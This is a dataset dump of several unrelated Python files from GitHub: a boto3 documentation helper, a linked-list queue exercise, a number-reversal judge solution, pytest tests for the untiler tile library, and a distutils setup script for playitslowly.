        for svc_name, client in services.items()
    }
    return data
def generate_json_input_for(method):
    """Return a skeleton input document for a bound boto3 client method."""
    client = method.__self__
    # Map the bound python method name back to its API operation name.
    method_name = client.meta.method_to_api_mapping[method.__func__.__name__]
    arg_gen = botocore.utils.ArgumentGenerator()
    input_model = arg_gen.generate_skeleton(
        client.meta.service_model.operation_model(method_name).input_shape
    )
    return input_model
def generate_html_for(method, param_name=None):
    """Render HTML documentation for a boto3 client method's input shape.

    If ``param_name`` is given, only that top-level parameter is rendered;
    otherwise every member of the operation's input shape is documented.
    Returns an IPython ``HTML`` object for notebook display.
    """
    import json  # BUGFIX: json was used below but never imported in this module

    client = method.__self__
    method_name = client.meta.method_to_api_mapping[method.__func__.__name__]
    input_shape = client.meta.service_model.operation_model(
        method_name
    ).input_shape

    def render(name, shape):
        # One section per parameter: heading, shape repr, docs and skeleton.
        block = "<h3>{0}</h3><h4>{1}</h4>".format(name, html.escape(str(shape)))
        block += "<div>"
        if len(shape.documentation) > 0:
            block += shape.documentation
        block += "<pre>{}</pre>".format(
            json.dumps(
                get_shape_data(client, shape.name), indent=2, sort_keys=True
            )
        )
        # BUGFIX: the original appended "<div>" again, leaving every
        # section's div unclosed.
        block += "</div>"
        return block

    page_src = ""
    if param_name is None:
        for key, val in input_shape.members.items():
            page_src += render(key, val)
    else:
        page_src += render(param_name, input_shape.members[param_name])
    return HTML(page_src)
| kernelpanek/jupyterlab-starter-notebooks | helper/aws_functions.py | aws_functions.py | py | 6,575 | python | en | code | 0 | github-code | 36 |
class Node:
    """A single element of the linked-list queue."""

    def __init__(self, value):
        # Payload plus forward link; the link is wired up by Queue.enqueue.
        self.value, self.next = value, None
class Queue:
    """FIFO queue backed by a singly linked list.

    ``rear`` holds the newest node and each ``next`` link walks toward
    ``front`` (the oldest node), so enqueue is O(1) and dequeue is O(n).
    """

    def __init__(self):
        self.front = None   # oldest node, removed first
        self.rear = None    # newest node, insertion point
        self.length = 0
        print("The queue has been initialised")

    def enqueue(self, value):
        """Append ``value`` at the rear of the queue."""
        newNode = Node(value)
        if self.length == 0:
            self.front = self.rear = newNode
        else:
            # The new node links toward the existing chain and becomes rear.
            newNode.next = self.rear
            self.rear = newNode
        self.length += 1

    def dequeue(self):
        """Remove, report and return the oldest value (None if empty).

        BUGFIX: the original only printed the removed value when the queue
        had exactly one element and never returned it; reporting is now
        consistent for every successful dequeue.
        """
        if self.length == 0:
            print("No elements in the queue")
            return None
        removed = self.front.value
        if self.length == 1:
            self.front = self.rear = None
            self.length = 0
        else:
            # Walk from the rear to find the node just before the front.
            temp = self.rear
            while temp.next != self.front:
                temp = temp.next
            self.front = temp
            self.front.next = None
            self.length -= 1
        print("dequeued : ", removed)
        return removed

    def traverseQueue(self):
        """Print the queue contents from front (oldest) to rear (newest)."""
        if self.length == 0:
            print("No elements in the queue")
        else:
            queueList = []
            temp = self.rear
            while temp is not None:
                queueList.append(temp.value)
                temp = temp.next
            # Values were collected rear-to-front; reverse for front-first.
            print(queueList[::-1])
# Simple smoke test of the queue operations.
queue = Queue()
queue.enqueue(5)
queue.traverseQueue()
queue.dequeue()
queue.dequeue()
queue.traverseQueue()
queue.enqueue(43)
queue.enqueue(56)
queue.enqueue(86)
queue.traverseQueue()
queue.dequeue()
queue.traverseQueue()
| qdotdash/Competitive_Coding | Data Structures and Algorithms - Udemy/Stack and Queue/QueueLinkedList.py | QueueLinkedList.py | py | 1,213 | python | en | code | 0 | github-code | 36 |
11578008291 | # 5648**
# BOJ 5648: reverse the digits of each number, then print them sorted.
import sys
nums = "".join(list(map(str, sys.stdin.readlines()))).split() # input note: re.split inserts empty strings when nothing sits between delimiters..
reverses = []
for i in range(1, int(nums[0])+1):
    reverses.append(int(nums[i][::-1])) # reverse a string: str[::-1]
for j in sorted(reverses):
    print(j)

# cnt, *nums = sys.stdin.read().split()
# for i in range(int(cnt)):
#     nums[i] = nums[i][::-1]
# nums = list(map(int, nums))
# print(*sorted(nums), sep="\n")
| starcat37/Algorithm | BOJ/Silver/5648.py | 5648.py | py | 516 | python | ko | code | 0 | github-code | 36 |
656371734 | #!/usr/bin/env python
import json
import pickle
import os
import pytest
import numpy as np
import mercantile as merc
import inspect
import rasterio
import untiler
from untiler.scripts import tile_utils
def test_templating_good_jpg():
print("")
expectedMatch = 'tarbase/jpg/\d+/\d+/\d+.jpg'
expectedInterp = 'tarbase/jpg/%s/%s/%s.jpg'
template = 'tarbase/jpg/{z}/{x}/{y}.jpg'
matchTemplate, interpTemplate, separator = tile_utils.parse_template(template)
assert matchTemplate == expectedMatch
assert interpTemplate == expectedInterp
assert separator == "/"
print("# OK - %s " % (inspect.stack()[0][3]))
def test_templating_good_png():
expectedMatch = 'tarbase/jpg/\d+/\d+/\d+.png'
expectedInterp = 'tarbase/jpg/%s/%s/%s.png'
template = 'tarbase/jpg/{z}/{x}/{y}.png'
matchTemplate, interpTemplate, separator = tile_utils.parse_template(template)
assert separator == "/"
assert matchTemplate == expectedMatch
assert interpTemplate == expectedInterp
print("# OK - %s " % (inspect.stack()[0][3]))
def test_templating_fails():
template = 'tarbase/jpg/{x}/{y}/{z}.jpg'
with pytest.raises(ValueError):
tile_utils.parse_template(template)
template = 'tarbase/jpg/{z}/{x}/{y}.poop'
with pytest.raises(ValueError):
tile_utils.parse_template(template)
template = 'tarbase/jpg/z/x/y.jpg'
with pytest.raises(ValueError):
tile_utils.parse_template(template)
print("# OK - %s " % (inspect.stack()[0][3]))
def tests_templating_scene_template():
template = '{z}-{x}-{y}-source-date-tileid.tif'
template, sceneTemplate, separator = tile_utils.parse_template(template)
assert separator == '-'
assert sceneTemplate == '%s-%s-%s-source-date-tileid.tif'
print("# OK - %s " % (inspect.stack()[0][3]))
def tests_templating_scene_template_numeric():
template = '{z}-{x}-{y}-source-2015-xyz.tif'
template, sceneTemplate, separator = tile_utils.parse_template(template)
assert separator == '-'
assert sceneTemplate == '%s-%s-%s-source-2015-xyz.tif'
print("# OK - %s " % (inspect.stack()[0][3]))
def tests_templating_scene_template_fails():
template = '{x}-{y}-source-2015-xyz.tif'
with pytest.raises(ValueError):
tile_utils.parse_template(template)
print("# OK - %s " % (inspect.stack()[0][3]))
def tests_templating_scene_template_separator_fails():
template = '{z}/{x}-{y}-source-2015-xyz.tif'
with pytest.raises(ValueError):
tile_utils.parse_template(template)
print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def inputTilenames():
with open('tests/fixtures/tar_list.json') as ofile:
return json.load(ofile)
@pytest.fixture
def expectedTileList():
with open('tests/expected/tile_list.json') as ofile:
return np.array(json.load(ofile))
def test_parse_tiles(inputTilenames, expectedTileList):
matchTemplate = r'3857_9_83_202_20130517_242834/jpg/\d+/\d+/\d+.jpg'
tiler = tile_utils.TileUtils()
output_tiles = np.array([
t for t in tiler.get_tiles(inputTilenames, matchTemplate, '/')
])
assert np.array_equal(output_tiles, expectedTileList)
tweakedTilenames = [f.replace('/', '?') for f in inputTilenames]
output_tiles = np.array([
t for t in tiler.get_tiles(tweakedTilenames, matchTemplate, '/')
])
assert len(output_tiles) == 0
assert np.array_equal(output_tiles, expectedTileList) == False
print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def expectedTiles19():
with open('tests/expected/tile_list_19.json') as ofile:
return json.load(ofile)
def test_get_xys(expectedTileList, expectedTiles19):
tiler = tile_utils.TileUtils()
tiles, minX, minY, maxX, maxY = tiler.select_tiles(expectedTileList, 19)
assert np.array_equal(tiles, np.array(expectedTiles19['tiles']))
assert minX == expectedTiles19['minX']
assert maxX == expectedTiles19['maxX']
assert minY == expectedTiles19['minY']
assert maxY == expectedTiles19['maxY']
print("# OK - %s " % (inspect.stack()[0][3]))
def test_get_xys_invalid_tiles():
tiler = tile_utils.TileUtils()
badtiles = np.array([0])
with pytest.raises(ValueError):
tiles, minX, minY, maxX, maxY = tiler.select_tiles(badtiles, 19)
badtiles = np.array([[1,2], [1,2]])
with pytest.raises(ValueError):
tiles, minX, minY, maxX, maxY = tiler.select_tiles(badtiles, 19)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_get_xys_invalid_zoom(expectedTileList):
tiler = tile_utils.TileUtils()
with pytest.raises(ValueError):
tiles, minX, minY, maxX, maxY = tiler.select_tiles(expectedTileList, 20)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_affine():
ul, lr = (-18848759.67889818, 19225441.354287542), (-18846313.693993058, 19222995.3693824)
expected = np.array([0.5971642834774684, 0.0, -18848759.67889818, 0.0, -0.5971642834820159, 19225441.354287542, 0.0, 0.0, 1.0])
assert np.array_equal(np.array(untiler.make_affine(4096, 4096, ul, lr)), expected)
print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def expectedMeta():
with open('tests/expected/src_meta.pkl', mode='rb') as pklfile:
return pickle.load(pklfile)
# SKIP UNTIL I DEAL W/ DECIMAL ISSUES
def test_src_meta_making(expectedMeta):
bounds = merc.bounds(10, 10, 10)
src_meta = untiler.make_src_meta(bounds, 4096)
for k, e in zip(sorted(src_meta), sorted(expectedMeta)):
assert k == e
# assert src_meta[k] == expectedMeta[e]
print("# OK - %s " % (inspect.stack()[0][3]))
def test_make_window():
expected = ((23808, 24064), (1024, 1280))
window = untiler.make_window(102, 343, 98, 250, 256)
assert window == expected
print("# OK - %s " % (inspect.stack()[0][3]))
def test_make_window_fails():
with pytest.raises(ValueError):
untiler.make_window(102, 13, 98, 50, 256)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_upsampling():
rShape = 2 ** int(np.random.rand() * 5 + 5)
rUp = 2 ** int(np.random.rand() * 3 + 1)
toFaux, frFaux = untiler.affaux(rUp)
test = np.zeros((3, rShape, rShape))
outputUp = untiler.upsample(test, rUp, frFaux, toFaux)
assert outputUp.shape == (3, rUp * rShape, rUp * rShape)
print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def expectedAffauxs():
return np.array([1., 0., 0., 0., -1., 0., 0., 0., 1.]), np.array([4., 0., 0., 0., -4., 0., 0., 0., 1.])
def test_affaux(expectedAffauxs):
toFaux, frFaux = untiler.affaux(4)
expectedTo, expectedFr = expectedAffauxs
assert np.array_equal(toFaux, expectedTo)
assert np.array_equal(frFaux, expectedFr)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_make_grey_imagedata():
inputData = np.zeros((1, 256, 256), dtype=np.uint8)
imdata = untiler.make_image_array(inputData, 256)
assert imdata.shape == (4, 256, 256)
assert np.array_equal(imdata[-1], np.zeros((256, 256), dtype=np.uint8) + 255)
assert np.array_equal(imdata[0], imdata[1])
assert np.array_equal(imdata[1], imdata[2])
print("# OK - %s " % (inspect.stack()[0][3]))
def test_make_rgb_imagedata():
inputData = np.zeros((3, 256, 256), dtype=np.uint8)
imdata = untiler.make_image_array(inputData, 256)
assert imdata.shape == (4, 256, 256)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_load_imagedata_rgb():
expectedLength = 65536
expectedDepth = 3
expectedSize = 256
inputData = np.zeros((expectedLength, expectedDepth), dtype=np.uint8)
imdata, imsize, depth = untiler.load_image_data(inputData, expectedSize)
assert imdata.shape == (expectedSize, expectedSize, expectedDepth,)
assert imsize == expectedLength
assert depth == expectedDepth
print("# OK - %s " % (inspect.stack()[0][3]))
def test_load_imagedata_grey():
expectedLength = 65536
expectedDepth = 1
expectedSize = 256
inputData = np.zeros((expectedLength, expectedDepth), dtype=np.uint8)
imdata, imsize, depth = untiler.load_image_data(inputData, expectedSize)
assert imdata.shape == (expectedSize, expectedSize, expectedDepth,)
assert imsize == expectedLength
assert depth == expectedDepth
print("# OK - %s " % (inspect.stack()[0][3]))
# With rasterio, this test no longer applies - still, checking for failure
def test_make_grey_depth2_fails():
inputData = np.zeros((256, 256), dtype=np.uint8)
with pytest.raises(ValueError):
imdata = untiler.make_image_array(inputData, 256)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_load_imagedata_random():
    """load_image_data handles arbitrary non-degenerate sizes and depths.

    The original drew sizes with ``int(np.random.rand() * n)``, which can
    yield 0 and silently turn this into a no-op test on empty / zero-depth
    arrays; ``np.random.randint`` with a lower bound of 1 guarantees a real
    reshape is exercised on every run while keeping the same upper bounds
    (the old expression never reached n either).
    """
    expectedSize = int(np.random.randint(1, 256))
    expectedLength = expectedSize ** 2
    expectedDepth = int(np.random.randint(1, 5))
    inputData = np.zeros((expectedLength, expectedDepth), dtype=np.uint8)
    imdata, imsize, depth = untiler.load_image_data(inputData, expectedSize)
    assert imdata.shape == (expectedSize, expectedSize, expectedDepth,)
    assert imsize == expectedLength
    assert depth == expectedDepth
    print("# OK - %s " % (inspect.stack()[0][3]))
def test_load_imagedata_fails():
    """A pixel count that cannot fill a size x size image raises ValueError."""
    # 65535 pixels is one short of 256 * 256
    flat = np.zeros((65535, 1), dtype=np.uint8)
    with pytest.raises(ValueError):
        untiler.load_image_data(flat, 256)
    print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def tilesShort():
    """Short [z, x, y] tile list loaded from the JSON fixture."""
    with open('tests/fixtures/tile_list_short.json') as src:
        tiles = json.load(src)
    return np.array(tiles)
@pytest.fixture
def expectedSuper():
    """Expected parent ("super") tiles for the short tile list."""
    with open('tests/expected/tile_parents.json') as src:
        parents = json.load(src)
    return np.array(parents)
def test_create_supertiles(tilesShort, expectedSuper):
    """Each tile maps onto its expected zoom-14 parent tile."""
    parents = tile_utils.TileUtils().get_super_tiles(tilesShort, 14)
    assert parents.shape == tilesShort.shape
    assert np.array_equal(parents, expectedSuper)
    print("# OK - %s " % (inspect.stack()[0][3]))
def test_create_supertiles_fails(tilesShort):
    """Requesting parent tiles at too deep a zoom raises ValueError."""
    tiler = tile_utils.TileUtils()
    with pytest.raises(ValueError):
        tiler.get_super_tiles(tilesShort, 20)
    print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def uniqueExpected():
    """The four distinct zoom-14 parent tiles expected from the fixture data."""
    return np.array([[14, x, 6464] for x in (2684, 2685, 2686, 2687)])
def test_find_unique_tiles(expectedSuper, uniqueExpected):
    """get_unique_tiles deduplicates the parent tile list."""
    tiler = tile_utils.TileUtils()
    assert np.array_equal(tiler.get_unique_tiles(expectedSuper), uniqueExpected)
    print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def expectedZooms():
    """Recorded per-supertile max-zoom / coverage results."""
    with open('tests/expected/expected_zoom_tiles.json') as src:
        zooms = json.load(src)
    return zooms
def test_find_zoom_tiles(expectedTileList, expectedZooms):
    """Zoom-tile selection for each unique supertile matches the recorded data."""
    tiler = tile_utils.TileUtils()
    parents = tiler.get_super_tiles(expectedTileList, 13)
    uniques = tiler.get_unique_tiles(parents)
    for tile, expected in zip(uniques, expectedZooms):
        maxZ, maxZcoverage = tiler.get_zoom_tiles(expectedTileList, parents, tile)
        assert np.array_equal(maxZ, expected['maxZ'])
        assert np.array_equal(maxZcoverage, expected['maxZcoverage'])
    print("# OK - %s " % (inspect.stack()[0][3]))
def test_find_zoom_tiles_fail(expectedTileList):
    """A truncated supertile list makes zoom-tile lookup raise ValueError."""
    tiler = tile_utils.TileUtils()
    parents = tiler.get_super_tiles(expectedTileList, 13)[:-10]
    with pytest.raises(ValueError):
        tiler.get_zoom_tiles(expectedTileList, parents, parents[0])
    print("# OK - %s " % (inspect.stack()[0][3]))
def test_find_zoom_tiles_floor_fail(expectedTileList):
    """A tile subset with nothing at or below the zoom floor (17) raises."""
    # per the fixture, the first 1000 tiles have no tiles less than z17
    subset = expectedTileList[:1000]
    tiler = tile_utils.TileUtils()
    parents = tiler.get_super_tiles(subset, 12)
    with pytest.raises(ValueError):
        tiler.get_zoom_tiles(subset, parents, parents[0], 17)
    print("# OK - %s " % (inspect.stack()[0][3]))
def test_find_zoom_tiles_floor(expectedTileList):
    """With a zoom floor of 17, tiles split into max-zoom and floor groups."""
    # per the fixture, this subset does contain tiles at or below z17
    subset = expectedTileList[1000:]
    tiler = tile_utils.TileUtils()
    parents = tiler.get_super_tiles(subset, 13)
    zMaxtiles, zFloortiles = tiler.get_zoom_tiles(subset, parents, parents[-1], 17)
    assert zMaxtiles.shape == (848, 3)
    assert zFloortiles.shape == (68, 3)
    # every floor tile sits exactly at z17
    assert zFloortiles[:, 0].min() == 17 == zFloortiles[:, 0].max()
    print("# OK - %s " % (inspect.stack()[0][3]))
def test_logger():
    """logwriter must append the message plus a trailing newline to the stream.

    The original built a random path under a hard-coded ``/tmp`` (non-portable,
    theoretically collision-prone) and leaked the file whenever the assertion
    failed; ``tempfile.mkstemp`` plus ``try/finally`` fixes both.
    """
    import tempfile

    rstring = ''.join(np.random.randint(0, 9, 10000).astype(str))
    fd, rfile = tempfile.mkstemp(suffix='.log')
    os.close(fd)  # reopen by name below; close the raw descriptor now
    try:
        with open(rfile, 'w') as loggerfile:
            untiler.logwriter(loggerfile, rstring)
        with open(rfile) as ofile:
            logged = ofile.read()
        assert rstring + '\n' == logged
    finally:
        os.remove(rfile)
    print("# OK - %s " % (inspect.stack()[0][3]))
| mapbox/untiler | tests/test_untiler_funcs.py | test_untiler_funcs.py | py | 13,079 | python | en | code | 39 | github-code | 36 |
24426403241 | #!/usr/bin/env python
import sys
import os
from distutils.core import setup
from distutils.command.install import install, write_file
from distutils.command.install_egg_info import to_filename, safe_name
from functools import reduce
class new_install(install):
    """distutils ``install`` command with two post-install steps:
    removing a stale module layout left behind by older releases, and
    writing a ``*.install-info`` manifest of every installed file so a
    later uninstall can locate them.
    """
    def initialize_options(self):
        install.initialize_options(self)
    def run(self):
        install.run(self)
        # hack to remove old module
        old_path = os.path.join(self.install_libbase, "playitslowly", "playitslowly.py")
        # try the compiled variants first (.pyo, .pyc), then the source itself
        for p in (old_path + x for x in ("o", "c", "")):
            if os.path.exists(p):
                self.execute(os.unlink, (p, ), "Removing old file %r" % p)
        # write install-info
        # manifest name is keyed to the running interpreter, e.g.
        # "playitslowly-py3.1.install-info"
        basename = "%s-py%s.install-info" % (
            to_filename(safe_name(self.distribution.get_name())),
            sys.version[:3]
        )
        install_info = os.path.join(self.install_libbase, basename)
        outputs = self.get_outputs()
        if self.root: # strip any package prefix
            root_len = len(self.root)
            for counter in range(len(outputs)):
                outputs[counter] = outputs[counter][root_len:]
        # record the final installed paths via distutils' execute() so the
        # step honours dry-run mode
        self.execute(write_file,
            (install_info, outputs),
            "writing install-info to '%s'" % install_info)
def ls_r(dir):
    """Recursively list *dir* as ``[(subdir, [filepaths...]), ...]``,
    the shape expected by distutils' ``data_files`` option.
    """
    entries = []
    for subdir, _dirnames, filenames in os.walk(dir):
        entries.append((subdir, [os.path.join(subdir, name) for name in filenames]))
    return entries
# Arguments for setup(), collected in a dict so the py2exe-specific
# 'windows' key can be appended conditionally below.
kwargs = {
    'cmdclass': {'install': new_install},  # custom install step, see above
    'name': 'playitslowly',
    'version': "1.5.1",
    'description': 'A tool to help you when transcribing music. It allows you to play a piece of music at a different speed or pitch.',
    'author': 'Jonas Wagner',
    'author_email': 'jonas@29a.ch',
    'url': 'http://29a.ch/playitslowly/',
    'packages': ['playitslowly'],
    'scripts': ['bin/playitslowly'],
    # py2exe build options: only used when building the Windows distribution
    'options': {'py2exe':{
        'packages': 'encodings',
        'includes': 'cairo, pango, pangocairo, atk, gobject',
        'dist_dir': 'dist/win32',
        'optimize': 2,
    }},
    'data_files': ls_r('share'),  # install everything under share/ recursively
    'license': 'GNU GPL v3',
    'classifiers': [
        'Environment :: X11 Applications :: GTK',
        'Intended Audience :: End Users/Desktop',
        'License :: OSI Approved :: GNU General Public License (GPL)',
        'Natural Language :: English',
        'Operating System :: POSIX',
        'Programming Language :: Python',
    ]
}
# py2exe is only available (and only needed) when building the Windows
# executable; on other platforms fall back to a plain setup().
try:
    import py2exe
    kwargs['windows'] = [{'script': 'bin/playitslowly',
        'icon_resources': [(1, 'playitslowly.ico')],
        'dest_base': 'playitslowly'}]
except ImportError:
    pass
setup(**kwargs)
| jwagner/playitslowly | setup.py | setup.py | py | 2,789 | python | en | code | 96 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.